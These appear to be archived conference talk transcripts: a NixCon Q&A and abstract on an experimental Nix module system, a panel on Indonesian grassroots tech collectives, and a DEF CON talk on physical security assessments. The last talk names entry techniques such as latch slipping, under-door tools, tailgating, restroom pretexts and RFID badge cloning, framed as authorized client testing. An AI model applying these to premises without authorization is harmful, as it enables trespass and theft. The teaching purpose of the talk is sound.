It makes the language more complex, because of course the existing language features don't go away. But there's also the cost of not having this: if we don't improve things like discoverability, we might lose a lot of potential users. So I would see it more from that perspective. All of this is motivated by thinking in terms of use cases. If a user wants to set up a Nix shell, what do they need to write? Currently, if they for instance want to write a flake for their project, they have to write a lot of boilerplate code just to get that to work. So we need to think about what an ideal Nix expression would look like. Or maybe you don't want to write a Nix expression at all and you want some other syntax for that. So yeah, I guess that's not a very good answer, but I don't actually know how to quantify the cost very well. Right. I do like that you're considering what an optimal Nix expression would look like. So the next question we have is from davidak, and it is about why TOML was chosen. Do you think you can answer that? Yeah, so I mean, I'm not very married to TOML, but it exists and it's well known, so a lot of tools have support for it, editors have support for it. You could go for JSON, which would be the simplest choice, but JSON is maybe a little too primitive, because you can't even have things like comments in it, at least not in a nice way. So JSON, TOML, YAML, those would be possibilities. And YAML is maybe a bit too complex. So TOML is kind of... it's not too bare-bones, so it seems like a fairly decent choice. Okay. Yeah, I think it's a fairly decent choice as well, actually. I think of those three options you mentioned, you picked the best one, but that's just my opinion. So another question from Andy, and I hope this is an okay question to ask, you can tell me if it isn't, but will I also need a Nix integration test at some point?
I wonder what's wrong with just nix build with the attribute flag and then doc. Ah, okay. So that actually works. Sorry, does it work? No. So ideally, at some point it would just work: you would just have a doc option that generates the documentation for your module. But, well, no, actually, that would be quite hard to do. No. Yeah, so the nix doc command internally just builds a Nix expression that takes the flake as an argument, so there's actually not a lot mysterious going on there. You could actually do it with a nix build, probably with an argument. But that's not very user friendly. Again, we want to avoid magic incantations: just saying nix build or nix doc is a lot easier than figuring out the correct nix build attribute name and so on. I hope that answers the question. Yep, I think that does. Let me see if there are any more questions. I actually do not think there are any more questions, and I believe that ends the Q&A portion. So yeah, we are on time for that. I guess this concludes your talk today, so thank you so much. I would also like to mention something briefly before we sign off. I really do like your avatar on GitHub, Dexter. Is that some sort of inside thing? Because I notice that Dexter is a precocious little genius who has a laboratory in his room and is always working on experiments, and I've noticed over past NixCons that you've also talked about your experiments, so you're both sort of scientists in your own right. Yeah, I mean, there's not really any deep thought that went into that, but I was a Dexter fan in the 90s, and we both wear glasses, so I guess that's close enough. Okay, I guess that signs off for today. Thank you so much. Everyone in the chat, please put clapping emojis or, you know, loud clapping sounds, and you know, we're live and direct.
And since we're talking about binaries, put ones and zeros in the chat, like, go crazy. Come on, I want to see the chat go crazy.
Nix's configuration language is quite powerful, but suffers from a lack of discoverability, usability and consistency. In this talk, I'll describe an experimental Nix module system that provides a consistent, discoverable mechanism to write configurations such as packages and NixOS systems, and show how this enables a better user experience for both new and advanced users. Nix's configuration language is quite powerful, but suffers from a lack of discoverability, usability and consistency. To name just a few examples: There is no easy way to find out from the command line or from the REPL what arguments are supported by functions like stdenv.mkDerivation or buildPythonPackage. Mechanisms like the .override attribute provide an almost unlimited ability to customize packages, but the only way to figure out what you can override is to read the source of the Nix package, and writing overrides is often black magic. NixOS has a nice self-documenting module system, but Nix packages are written in a completely different functional style. The Nix CLI doesn't know anything about package functions, .override and .overrideDerivation, the NixOS module system, the Nixpkgs config attribute set, Nixpkgs overlays, or any other customization mechanisms that have emerged over the years. The syntax and semantics of Nix expressions are often an obstacle to new users and have a steep learning curve. In this talk, I'll show an experimental Nix module system, similar to the NixOS module system, to replace the "functional" package style used in Nixpkgs. This means that functions like mkDerivation or buildPythonPackage as well as packages become modules that can build on each other. For instance, the "GNU Hello" package is a module that inherits from the unixPackage module, which in turn inherits from other modules like derivation. Package customization is done in the same way: by inheriting a module. These modules, just like in NixOS, have types and documentation.
As a result, everything becomes discoverable and modifiable from the command line. For instance, there is a command nix list options that shows everything that can be customized in a package. It also provides a standard for documentation: the command nix doc generates HTML documentation for the modules in a flake.
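To make the idea concrete, a module-style package might look roughly like the following sketch. This is not the actual syntax of the experimental system described in the talk; the `extends` option, the `unixPackage` base module and the use of `fetchurl` here are illustrative assumptions based on the description above.

```nix
# Hypothetical module-style definition of GNU Hello. Instead of calling
# stdenv.mkDerivation as a function, the package is declared as a module
# that inherits from a base module, in the same declarative style as a
# NixOS configuration.
{ config, lib, ... }:

{
  # Inherit build logic and typed, documented options from a base
  # module, analogous to `imports` in the NixOS module system.
  extends = [ unixPackage ];

  pname = "hello";
  version = "2.12.1";

  src = fetchurl {
    url = "mirror://gnu/hello/hello-${config.version}.tar.gz";
    sha256 = lib.fakeSha256;
  };
}
```

Because every attribute would then be a typed, documented option, a command like nix list options could enumerate exactly what this package accepts and what can be overridden, instead of requiring the user to read the package source.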
10.5446/50669 (DOI)
So, welcome to Datenspuren. Now I have three very interesting people in Jitsi. They are coming from far away in the world. They come from, as I see, Indonesia. They want to tell us about utopias, also about grassroots utopias of Indonesia. And I will hand over to you guys. And I am very interested. Thank you. It's yours. Thank you very much. Can you hear me? Can you confirm that you can hear me? Yeah. OK, perfect. Very good. Thank you very much for this. So, exactly. Hello and welcome everyone to this session on democratizing and decolonizing the future, also grassroots utopias from Indonesia. And so our idea for today was to show you four projects that represent completely different approaches to hacking and making in Indonesia. And we chose these because the topic of the conference is basically to dare more utopia. And in my opinion, that is exactly what the collectives that you will hear from today are doing already. They try to solve social problems. They critique current practices and the status quo. And they also raise awareness around societal and social problems. And they democratize and decolonize technology. And they basically do this in order to make the future more equitable. That means that by doing the work that they are doing today, they try to create positive futures for their communities and also around the world. So I personally, my name is Regina and I work at the Technical University of Berlin. I did my field research in Indonesia for my dissertation a few months ago. And that's where I met our speakers who are going to be presenting today. So today, first up, it's going to be Adin from the Hysteria Collective from Semarang. So I'm the first one. Huh? Yes, because you're the first in the alphabet. The second will be Ira from Yogyakarta, who is the founder and director of HONF, the House of Natural Fiber. And then we will hear from Gustaf, who is the founder of Common Room in Bandung.
And last but not least, we will hear from Benny from the Oknum Media Collective in Surabaya. So they are actually joining us from different parts of Java. And of course, instead of talking for them, I will now ask them to present their projects. And the idea is to help us understand what they do by showing and explaining some of the projects that they do, with a special focus on the technologies they use. And also to tell us about what social problem they try to solve and explain to us the context of these projects, meaning why these projects are necessary in order to create happier and more equitable futures. So for the next 25 minutes, we will learn about the four projects. And then we would like to open up the session for a Q&A, in which you should feel free to ask questions in German as well. We will be translating these for the panel. So first up, let's hear from Adin, who runs the collective with, in my opinion, the funniest logo in all of Indonesia. And Adin, will you need me to run the presentation or will you do that? Can you share my presentation? Yes. And just a sec, I will share my screen, which I'm doing right now so we can see your face. And here is your presentation. Okay, because the time is very short, I will start now. So this is our collective. Basically, we are an artistic collective from Semarang. Semarang is located in Central Java. Next. We call ourselves a kolaboratorium and creative impact hub, because we do many collaborative experiments and do things with platforms and sometimes with art projects. Before we knew that our capacity was being a hub, we could not identify what we were, until we realized that these practices are more like a hub. So that's why we are branding ourselves like this. Next. And this is our space; we have rented a house since 2008. And we use this house to do many things, like workshops and exhibitions, and also performances. Next. And this is another part of our space.
There is a backyard and we can use it for doing gigs and music concerts. And we also have a small library and collection with many things from cities across Indonesia. Next. So these are the issues: the lack of public participation in terms of urban planning, urbanization and also the contestation of land ownership. The government lacks the capacity to involve people to engage in the way that is necessary. And there is a vulnerability of social solidarity and a lack of a sense of belonging. So in terms of public participation in Indonesia, the government guarantees us the right to participate in urban planning. But in fact, there are many obstacles to doing that. So as an artist collective, and also given the policy on this issue, we want to do whatever is possible, as long as it fits with our capacity. Next. So what are we doing now? First, we do place-making projects to build engagement. And we use vernacularism as collective memory. I mean, we do site-specific ethnographic research. And then we do mapping, social mapping, asset mapping, and also folklore and things connected with the collective memory that support people becoming one community. It is related to the previous issue, that people don't attach to the place because they feel the place is not special anymore. Because of that, sometimes they just abandon their concern for the place itself. So that's why the place-making project is very important for us, to attach people to the place. We use stories from people and also social media and some applications that are already available in the app store or something like that. So this leads us to the third thing, which is building with what is available, within our capacity. For example, this is our activity: we were using the TikTok platform before it became viral.
This was two years ago, when the government wanted to ban TikTok because it was "useless". But we were using it to tell the story. That happened a long time ago, before TikTok became viral. And we just practiced that, wanting to reach another audience that's very different from YouTube, Instagram and the rest. So this is basically what we do: mapping and also interviews in the community. Next. And we bring this data into online mapping. We are using OpenStreetMap, and also a citizen-reporting platform to report things that happened at that site. Next. And we also create murals related to the stories that happened in the place. Next. And we also do 3D scanning, because we want to create augmented reality, using Aurasma. Aurasma is an application that has now become HP Reveal. So the basic idea is that we use available applications and then use them for our benefit. That's how we use technology, in our terms. Next. So this is the actual map. But we can go to the specific site itself to see how the trigger image can lead us to the many stories that we gathered before. Next. Yeah, this is one of our festivals in a kampung. It's the smallest unit of social community in Indonesia. Next. And the last one: we have a place- and space-making machine. We have two or three motorcycles, tricycles. What do you call it? Like a three-wheel motorcycle. So we use this, the, what do you call it, the becak, to create a stage so people can perform, and also for exhibitions in that place. So sometimes we use this to go into small alleys to intervene in the site and then create an art event or art project. Next. Yeah, that's the real thing before the event. Next. So now we have many public networks, not only in Semarang, but also in other cities, and we have connected with each other by using a WhatsApp group.
And we also update all this information through WhatsApp. Next. Okay, I think it's done, but can I share the video about how we manage it, if possible? Thank you. Yes, sorry. Yes, absolutely. I think that I just need to go back to the video thing and then you can take the screen sharing up. Okay. Yeah, yeah. Life is half as part of the line of death We're about to let you sign inside, we believe For real, man, I'm a real man Just try to pass through the water now Keep on your feet and the ground, I'll give you my name For times you can't free off the law A tower of earth and dissent as you grab your tickets Sealing here, reprise your head and we'll be coming For real, man, I'm a real man Just try to pass through the water now Keep on your feet and the ground, I'll give you my name For times you can't free off the law A tower of earth and dissent as you grab your tickets Sealing here, reprise your head and we'll be coming For times you can't free off the law A tower of earth and dissent as you grab your tickets Thank you for all the time. Unless there are any immediate urgent questions, we would then move on to Ira's presentation. Okay. Ira, are you ready? Yes. Hello, so I'll just start, okay? Can you hear me? So my name is Irene Agrivina, and people call me Ira. I come from Yogyakarta, Indonesia, three hours from where Hysteria is based. And so I'm the co-founder of HONF, a foundation focusing on art, science and technology. And I'm also the founder of XXLab, a female collective that is also focusing on art, science and technology. I will not speak too much because I have a video that presents almost everything that I wanted to talk about and share. So I will share the video, it's about five minutes long. And I hope it's clear and entertaining. So I will just start to share it, yeah, I hope you will enjoy it. Oh, sorry. Sorry, sorry. My name is Irene Agrivina. So can you hear the sound now?
We do something like art combined with technology, so it became a community. And then we moved from our home into a little garage belonging to my grandma. Here hacking means you have to improvise, because sometimes the price is too high, and then we hack it. So we build prostheses from local materials like bamboo, pineapple fiber and wood. That idea came to our minds because it's hard to get a prosthesis here, and sometimes you have to wait in a long queue to get just one prosthesis. Before I came to Australia, actually a lot of Australian artists came here and we collaborated on some projects. So I was invited to Melbourne University to do a presentation about art, science and technology, and then I did a workshop. And I hope in the future we still have more networks and connections so we can do more sharing. There are also a lot of people asking as well: why do you want to keep your research open, why do you want to give away your knowledge, why do you stick to openness and why do you fight for open culture, open science, open design or open source technology? But I think to be open means you give more rather than you take. The project is actually about how you know about the quality of the water: how much do you know about the water that you drink every day, or use for washing every day? That's our water purifier. Every household here can make it by themselves, and then they have clean and safe water to drink every day without having to buy it. It is much easier for us as women to talk to other women. And the women play an important role here, because they are the ones who do the domestic jobs. Especially if they are housewives, they are the ones who control the quality of the health of the families. The women are the ones who do the domestic jobs. So actually the women's position in the science and technology industry is still a bit sad or difficult in Indonesia. Women actually have more ability
because we are patient enough, and we have a strong desire to understand something, or to do something, or to share the things that we have done with other people in a very easy way. Jogja is actually kind of like a big kampung or big village. We still like gossiping, we still like to know what each other is doing, we still like to help each other, like living in a big community. We still don't really think in terms of industry or capitalism. In the city you still have this feeling that you belong to the society. We actually call it domestic hacking, and then the female citizen actually responds to what we call hacking. Do I still have time? I think I will do more Q&A later, so people can ask me what domestic hacking and hacking mean. I think we can move to Gustaf or Benny, or I can let Regina take over again. The next person is going to be Benny, who shared his presentation with me, so I just want to check that we can actually hear you, Benny, and then I will continue with your presentation. Can you just say a few words? He seems to be muted, we can't hear anything, he seems to be muted. Can you check your microphone connection?
In that case maybe I will move on to Gustaf, and then we can do some troubleshooting in the background with Benny. Hi, my name is Gustaf, I'm based in Bandung. In the past couple of years we have worked closely with the Ciptagelar indigenous community in West Java. Tonight I will try to share one of our projects, a community networks initiative in the Ciptagelar indigenous community. I hope you can see clearly from there. So in October we plan to organize the Rural ICT Camp; it's part of our project focusing on local community infrastructure in Ciptagelar village. Basically, why we are interested in working with indigenous communities in Indonesia in particular is because most indigenous communities in Indonesia live in forest areas, which are very important for maintaining biodiversity and also matter for the climate change situation. And in Indonesia, as in many parts of the world, since the COVID-19 pandemic internet connectivity has become an essential tool for much important work. In Indonesia we have seen significant growth in internet penetration, but the digital divide is still an issue, and mostly the problem is that there is an absence of internet infrastructure. There are large differences in bandwidth cost between different islands, unavailability of proper devices, and also a lack of local content and digital skills, and a gender gap. Currently we have at least 12,000 villages that have no internet access, and in West Java alone I think around 42,000 students don't have any internet access to continue their studies. We are also facing global challenges like many people in different parts of the world: there is huge population growth in Indonesia, and also an increasing development gap between urban and rural areas. We are also facing the impact of climate change, as well as an increasing number of people affected by the coronavirus pandemic, and the Rural ICT Camp is our effort to support the consolidation of ideas, practices and initiatives from common citizens in developing
community-based internet infrastructure. This initiative is actually part of a digital access program, as well as a community-led approach to address the digital divide in Indonesia, supported by the Association for Progressive Communications. So our main objective for this project is to overcome digital divide issues through the development of a community-based internet infrastructure, and apart from addressing the digital divide we also try to support the sustainable development agenda, indigenous land rights recognition, as well as mitigation of and adaptation to climate change, including the COVID-19 pandemic response and prevention, and youth and women empowerment in our region. So there are several agendas that we are trying to address in this ICT camp. The first is to elaborate the internet ecosystem policy and regulation for rural and remote connectivity in Asia, as well as technology and business models, including media literacy and civic empowerment for remote places. During the ICT camp we are also planning the inception of a training center and media lab that we are trying to develop now, and we're going to release a book, a practical guideline for local community-based internet infrastructure development, as well as webinars, workshops, sharing sessions and exhibitions. And so far we have already done several preparations, like for example regular visits to the village to talk to the chief as well as the local community that is engaged with this initiative. We just organized a workshop together with ICT Watch, Indonesia ICT Volunteers and the Indonesia ISP Association in order to prepare the Rural ICT Camp. We are also doing global meetings with our fellows from APC to coordinate and to share some of the recent developments from our side. And yeah, I think that is some of the information that I would like to share with you, and maybe we can discuss further during the Q&A, thank you. Very, very cool, thank you very much for that, and then we will move on
to Benny, if we can hear him. Hello, can you hear me? Yes, yes, I can hear you. I probably am using it to complete some of the audio collected. Alright, the only problem is that I can hear some weird feedback sounds, yeah. You have to mute your speakers, mute your speakers and just talk. Thank you. Okay, that sounds better, so I am going to start your presentation, yeah? Can you show the picture of my, yeah. Okay. Can you see it? Yes, this is my artwork, since I am using technology and electronics to make exhibitions. Next. For this, I am using a surveillance camera and something like a microscope, and I am not building these artworks only by myself. Continue, next. For the X movies, next. For this, I am using a microscope, and next, I am using speakers and many videos. Next. Next. This is Genteng Market. The market is located in the city center of Surabaya, and the market is very unique because on the first floor they are selling vegetables and goods for everyday consumption, but the second floor is full of electronics, and the sound of prayer from the mosque is very loud. Can you hear me?
Go ahead. Okay, go ahead. Okay. Thank you. The sound, I am playing the sound, the voice is very loud, this is the video input. Okay, I'll continue. This market is very unique because the market is located in the city center of Surabaya, and some of the electronics are imported from other countries, for example from China, and the size is very big. Next. This is my technician, and the technician is very special with sound, and some of the knowledge of the people is self-taught. They are learning by doing. Next. This is the situation of the sound, and the sound of the technician using some of the technology. Next. This is one example of the market closing down: many stores are closed and many stores were shut down during the pandemic, and I just tried to come and make a project. Next. Next. I use parts of the electronics to make science-fiction-like props, like the plumechatronics or something else, and I just use plastic or electronic components to make wearable technology. Next. Our project will continue until the end of this year, and I need to collaborate with some technicians and sellers to make possibilities with the sales of the electronics. Next. This is the new prototype. I use many parts from the past, and then the market, using electronics and some of the electronics equipment. Next. And they still relax. Next. This is the situation of the past and now. They are still happy and they are still positive. They still have the power to survive during the pandemic, and even though the pandemic makes everything stand still, they still relax and have support and power and a spirit. Thank you. Thank you very much. Next. Maybe we can, after that maybe we can discuss. My question, I am sorry. Yes. Thank you very much for this. I have never seen a word of Indonesian in my life. But I am really happy that the people still get to relax and not worry about the future. I think the pictures didn't really quite show how vast the market
is, and how full it is of all sorts of electronics and bits and pieces, and people just soldering away and making the most fantastic music systems and all of that. So I am happy that they are doing well. Right, so that was it for the presentations. We have heard a bunch of different societal issues and questions, and also attempts to solve these. And if we have any questions from the audience, I would like to jump over to that now, because we are supposed to be running out of time in two minutes. Well, actually we can give you five minutes more. We don't have anything from the internet; I have two questions, and we have three people in the audience. I don't know whether we have questions there. It doesn't look like that. So my question is: where can we find you guys on the internet? I think it's important to have some way to connect. So who would like to answer this? Adin, would you like to start? How can we find you? Hello? Yeah. So do you have a website, do you have an email address, something you want to share to get in contact with people, hackers from around the world, hackers from Germany? Yes, it's written in my presentation, actually on the last page. Okay, we'll try to put that in our video information. Okay, next. You're muted, Ira. You have to push the spacebar. Yeah, so I wrote the address in the chat, so you can go to our website, honf.org. And then you can find everything about our projects and our last project, and also some contacts there. And of course I have a personal email if you want to contact me, but yeah, just go to honf.org. Okay, thank you. For Common Room you can just visit our website, commonroom.info, or maybe also Twitter and Instagram at commonroom underscore id. And you can find a lot of information and also our contact details on that website and on Instagram and Twitter. Thank you. Okay, so my last question is: if someone would like to support you guys, will they find information on your website, or how can folks from Germany support you with money or maybe with hack advice or with whatever?
Do you have a funding source you want to mention? In my case, we have no long-term supporting foundation, I mean funding, so we sometimes have a project and do, what do you call it, like a cross-subsidy. And then we get another job and then create another project, and sometimes the Ministry of Education and Culture in Indonesia gives us some money, but it's not enough to sustain us. So basically we do this because we have a vision, and we know that there is a possibility that we can monetize this, but not now. Okay, I think those were our questions from the audience and from the internet, and if you don't have anything to add, I think that will conclude the event. Okay, well, thank you very, very much for letting us share these stories. It was really a pleasure, and I hope that we could show the audience something new, something different. And yeah, you can find the projects online, and they will be more than happy to reply to any questions that you might have in the future. And if you go to Indonesia, then please make sure that you look for them and that you reach out to them. I think that they are always extremely generous in showing everything that they have, so you can also learn a lot from them on site once this pandemic is over. Okay, thank you. Thank you everyone. Bye bye.
In this online podium discussion we will present the power of critical ideas and show examples of utopian futures in the making in Indonesia. The projects created by Indonesian hackers and makers use technology to solve one or more local problems, attempting to create a more equitable and positive future for their communities. They will be streamed as they happen live: different projects from around Indonesia will show how they make social change happen. Indonesia has a thriving hacker and maker, activist and innovator ecosystem, and many of them have been active for more than 20 years, since the first free elections were held in 1999. They have been asking difficult questions about society and finding answers that they choose to represent in different ways: music festivals, educational workshops on climate change or privacy, community projects that involve artists and locals, or building ICT infrastructure to allow people in rural areas to access the Internet and thereby, information. In this session, we will try to bring some of them together to show the projects they're working on today to turn the dystopia into a utopia. Two projects are confirmed, including - Benny, a media artist & independent media researcher, started in 1999 and involved in various national and also international media events. He focuses on human-machine and machine-machine interaction. Recently he formed a collaborative project with interdisciplinary colleagues as "Oknum Media Kolektif" and some of the works are: Bitversus, Double Layer Panopticon, Mencari Wiji (searching for Wiji), Rekombinan & Insitu. He will share some experiences of those works. - Irene Agrivina is an open systems advocate, technologist, artist and educator. She is one of the founding members and current directors of HONF, the Yogyakarta based new media and technology laboratory.
Created in 1998 as a place of open expression, art and cultural technologies in the wake of the Indonesian "revolution", HONF aka the 'House of Natural Fiber' was born out of the social and political turmoil against the Suharto regime, its nepotism and governmental corruption. Agrivina will share her experiences working with affordable and open technologies for grassroots movements in Indonesia. - Common Room has been involved in developing an urban/rural collaboration platform together with the Kasepuhan Ciptagelar indigenous community in West Java since 2013. For this session, Common Room will share some experiences in developing local community-based internet infrastructure in the Ciptagelar region. - Instead of creating new applications, the Hysteria Collective uses existing tech for community advocacy work: for example, to tell the history of a village. We use anthropological methods to build relationships with communities in order to explore community solidarity, and we look for the collective memories through daily life stories and folklore. To tell these stories and emphasize the outcomes, we use technology as a tool, way or method to achieve the goal of sharing the stories, for example, through OpenStreetMap, Aurasma or HP Reveal, and social media. What ties these projects together is their capability to critically assess the current societal, political, technological situation and address it in meaningful ways to show that the future can be safer, sounder and more equal for all of us. The solutions they come up with are just as diverse as the problems they address, so let's hear more about it from them.
10.5446/50739 (DOI)
Hello, Defcon Lockpick Village. Super excited to be here. This is my talk, Doors, Cameras, and Mantraps, Oh My: an overview of the ins and outs of physical security risk assessment. If you are curious about pursuing this as a career option, you are in the right place. If you want to learn about lockpicking, I'll mention some sources that can help with that later on in the talk. Here is a quick intro. I am The Magician, or Dylan, whichever you prefer. I'm a member of The Open Organisation Of Lockpickers in Orlando. I am a security consultant with GoldSky Security. I teach cybersecurity at the University of Central Florida, Go Knights, and I am an overall security enthusiast. This is really a hobby for me as much as a career. What I do is straightforward. I explore client sites with the defenders in tow so I can demonstrate for them any physical security vulnerabilities I spot. Bringing the client defenders with me allows for a teachback while on site instead of solely in our report. It is an absolute blast. This mostly summarizes the process: I show them the vulnerability and I tell them the mitigation. So what are we going to discuss in this talk? This is not a lockpicking or how-to talk. This is more a talk about the processes and procedures, mostly about what we look for and how we relay the information to the clients. I will cover physical security controls, key questions I ask my clients, and how I go about educating the clients about risk mitigation. At the end, I'll talk about how to approach this field. Physical security controls start with the front door, I think. So I want to start with doors and windows. There are a lot of mechanical components to doors, but here's a short list I tackle. Do perimeter doors have the hinges exposed to the outside? Those hinges can be exploited. Can I slide something between the latch and the strike plate to pull the door open without a key or combination?
Can I get tools over or under the doors to manipulate the door handles? If I run across double doors, can I manipulate crash bars? Those bars that go across the middle of doors that you can kind of push open with your hip so you don't need to use a knob or a handle. These are all resolvable exploits. While some windows can be opened or manipulated in similar ways, they offer different challenges. In a lot of office spaces, some clients don't have policies about shoulder surfing, or looking over the shoulder of a user to obtain information. This is a physical security risk. If someone is trying to establish a good time for physical entry, maybe just what PC operating systems are being used, or even information as simple as what browser type a particular company is using, looking through a window is really low effort. This clip, by the way, is very much not a risk model my clients have ever asked me to test. The next physical controls are fencing and bollards. Both are passive and require little maintenance in most cases. Even though some folks are scratching their heads about what bollards are, don't worry, you've seen them before. Fencing is obvious. Maybe folks have them at their homes or at work. Fencing establishes a clear perimeter and, if locked, clearly sets an expectation of limited access. It would take a heck of an improviser to explain to a guard why you are walking around a parking lot or building at a locked and closed facility. It's also near impossible to scale a fence in most environments without attracting attention, unless in a very rural location. You have all seen bollards before. They are the reinforced obstacles that prevent the use of a vehicle as a battering ram to create a point of entry in an otherwise defended structure. This is a very fancy hydraulically assisted version, but here we are at a Target. Remember when we used to go to Target in 2019 for groceries? Those were the days.
In front of the store, these steel reinforced concrete spheres are not just to look cool. They actually prevent people from running their cars into the glass doors to gain access in off hours to steal random stuff. It's a pretty simple passive risk mitigation, I think. Well, bonus, I just find it fun to say bollards. Next up are mantraps. This is a super cool concept. Mantraps are completely underutilized. Sure, it's a challenge to get people through them. You'll understand why a flow of people can be interrupted in a moment, but I think they are really awesome. Many banks have them, and after seeing the next slide I am willing to bet a few of you are going to be sitting at home saying, holy cow, I've totally seen those. This is a great scene from the movie Sneakers, my personal favorite hacker movie. The lead character Bishop walks through a glass sliding door after using the magnetic stripe reader. The door closes behind him, and another door is in his way that uses a biometric reader. Now he has to get past that. Super neat control that I would love to see in more places. Cameras are a great security control for several reasons. If you have the means, I encourage you all to grab some Power over Ethernet or Wi-Fi cameras and try hacking them. Cameras are in most businesses and some homes now. If you have the funding at a job site, you can even have your cameras actively monitored in a SOC, or Security Operations Center. Lots of small to mid-sized businesses just record video and reference it in incident response if something goes wrong, for forensic purposes. Video is easy to store, and you could find out who took company property, maybe after they got terminated, or who was negligent in some security policy. There are many technologies in the world of cameras, but I firmly believe that Wi-Fi cameras specifically are a poor choice. Please reach out for that soapbox rant if you like.
A fun fact about a lot of security cameras is that often they aren't even powered on at job sites. Because I love surveillance cameras and have several to tinker with at home, my oldest son has developed a curiosity around them and likes to point them out when we are at theme parks here in Orlando. He can quite accurately count the number of cameras on the walk up to a structure. Would you have seen the two massive dome cameras on top of this archway at Universal Studios Florida if I had not put boxes in this photo? Heck, I can hardly even see them with the boxes, but I assure you if you go to Google Maps, they are there. Go check it out. For electronic access, I am going to do a very light touch because it is quite a dense topic. Most of you are in an office environment and have some token that grants you access. A radio frequency ID badge that you wave in front of a reader that opens a magnetically sealed door might be your front door. A PIN code that is shared among employees and janitorial staff might get you into privileged rooms. Maybe a fingerprint even unlocks the laptop at your desk. Grocery stores even have electronic sensors that detect motion, know when someone is there, and open for you. All of these things can be exploited or copied in some way. I personally am one of the many cyborgs in the hacker community. I got an implant from Dangerous Things last year and can clone radio frequency ID badges to my hand. I use that to educate clients about the importance of cycling the guest badge, so that someone can't take that badge number and then come back with it and let themselves in. Next, I want to talk about how to speak to clients in a productive way. What is your personal area of concern? In other words, ask a client what on earth they care about. I've demoed a parking-lot-to-server-room break-in in four minutes and had a client shrug their shoulders. Their dollars were in a manufacturing area in another, more secure location.
Ask your client what they want you to put time into. Being efficient is a good way to get repeat clients in a role where often you're billing hourly. Don't miss any doors. There is no shame in verifying with a client that you have tested the entire perimeter. Ask which doors get the most traffic and which get the least. Some doors may have super beefy security while another, maybe a smoking area door, has people flowing in and out of it throughout the day and has less security, favoring convenience. Those are good doors to test a tailgating attack, where you try and walk in behind an employee. Because you truly are a guest in the scenario of being a security risk assessor, you can test guest access policies firsthand. In some cases, if it is in scope, meaning if the client has agreed to it ahead of time, try entering the client premises and asking to use the restroom, then see how far you can get into the building unattended. If you show up and notice a robust check-in policy, maybe with a photo and temp badge, great. That is often not the case. Do you get an escort? Also a bonus. Can I keep an RFID badge and replay it when I come back next year for an assignment? Not ideal, but I've seen that before. Do you get watched like you're a suspicious hacker in a hoodie, or is there instant trust once you've made it past the perimeter? Final fun thing to look for if you get a guest badge: where can you get in the building? You might be surprised to find yourself in a CEO or CFO office if you're lucky. Here we see some extremely robust guest security policies in action. Armed guards are monitoring a guest who is also restrained and has their tools confiscated temporarily. Someone in security operations hands the guest off to a person of authority, who is also armed, for the purposes of communication. This is a bit much, but similar procedures are not unheard of in a military or DOD establishment. As a social engineering enthusiast myself, this is a huge topic.
Entire companies are dedicated to just educating and empowering employees to act as part of the security team for a company. Here are quick points on the matter. Gamify your security training. A traveling trophy can go on the desk of the person with the fewest clicks on email phishing one month, or maybe someone else who always locks their computer when they head to the break room. Be creative. Let employees know that they're an integral part in the security of their company and that they can be the first line of defense. Every employee is part of the security team. As a social engineering enthusiast, this is equally important. You want to make sure you're establishing rapport with your clients. You want them to want you to come back. Constructive criticism can be done in a very positive way. While there have been tons of talks about how to exploit mechanical components of physical security, there have been just a few that cover the specifics of educating the clients on how to go about resolving the exploits that you've demonstrated on the job. Constructive criticisms are the way to go. A positive focus is absolutely critical. Directed or accusatory verbiage is never productive. Sayings like "this is so bad" or "I can't believe you set it up this way" need to be replaced with "we have some good opportunities here for improvement." Simple phrasing can mean a huge world of difference. Also, leading a client to come to their own conclusions through education and demonstration will work wonders for client morale. Here is the show and tell part. This really is my favorite part of the job. Showing the defenders vulnerabilities on site is immensely fun and can have an extremely positive impact. Telling someone you can bypass a door versus showing them how has a huge difference in the likelihood that a mitigation will be implemented. This step in the process also gets the most heads popping into the room. It gets people excited about the security of their company.
I have yet to run across a group of employees that doesn't show interest in an under-door tool or a latch slip. This is pretty big. This is all about soft skills and keeping people calm in an otherwise stressful environment. Fear, uncertainty, and doubt have no place when you're trying to be productive. You want to avoid saying things like, oh, this is bad, or, you've done this incorrectly. Instead, be inclusive and positive. We can fix this. No big deal. Make sure that you're explaining things to them, not telling them. You don't want to just send an email with resolutions. You want to actually have a human conversation. This is pretty much the best explainer of fear, uncertainty, and doubt and why it can damage a client relationship. Fear is not a good motivator to get risks mitigated. Educate and empower. Never belittle or disrespect. Provide some means for clients to reach out to you. Don't be out of touch. A reputable company should provide you with a company email, and if you're lucky, a company phone number. This can separate work and home, and keeping a work-life balance in this particular career field can be challenging at times. Make sure to also set expectations about when you can be reached and how long it may take for you to respond. I feel education is the most important aspect of hacking and security. That's not to say that a four-year degree or anything like that is needed. Kudos if you're going that route. The different approaches to learning are varied, but here are a few. Podcasts, YouTube, and Udemy were big wins for me personally. If you want to get into lockpicking or just see some jaw-dropping feats of lock exploits, then look no further than LockPickingLawyer. The content on his channel is consistently enjoyable and never stale or boring. If you are an auditory learner, then podcasts are fantastic. Darknet Diaries is amazing, with great storytelling and incredible guests.
The lessons learned are valuable and always come in an entertaining package. If you want to direct your attention at certification to prove you know a specific skill set, then Mike Meyers on Udemy has, I personally think, the best online content for CompTIA Security+ and Network+. He does cover some physical security content in the Security+ lecture, and he does it in a very fun way. These three are Bill Nye-level explainers, for those of you who are old enough to remember Bill Nye from the 90s. While not everyone learns from books, I know I certainly can, specifically if the content is fascinating to me. I tried to trim this down to a short list that I can recommend for everybody. Social Engineering: The Science of Human Hacking by Chris Hadnagy is a very professional and comprehensive guide to social engineering, if you want to learn more about that kind of engagement. Practical Lock Picking by Deviant Ollam gives you a more complete understanding of locks, not just how to pick them. The Art of Deception by Kevin Mitnick is super famous, and if you haven't read it, you really should. Although, I will mention that Chris Hadnagy's book is more of a scientific and professional approach to learning about social engineering. What Every Body Is Saying is very useful for reading people. This is helpful in everyday life as well as on the job. Just like previously, I wanted to throw in something strictly for those aiming at certifications. I really am a huge fan of anything and everything under the Exam Cram brand. I really think they portray the information in a way that's very easy to absorb. This was a big topic for me, and I hope to emulate those who helped me and pay it forward, so to speak. Approach professionals and listen to talks. Be courteous. These people are busy and have their own lives. That consideration aside, security professionals are people and like to share their experiences.
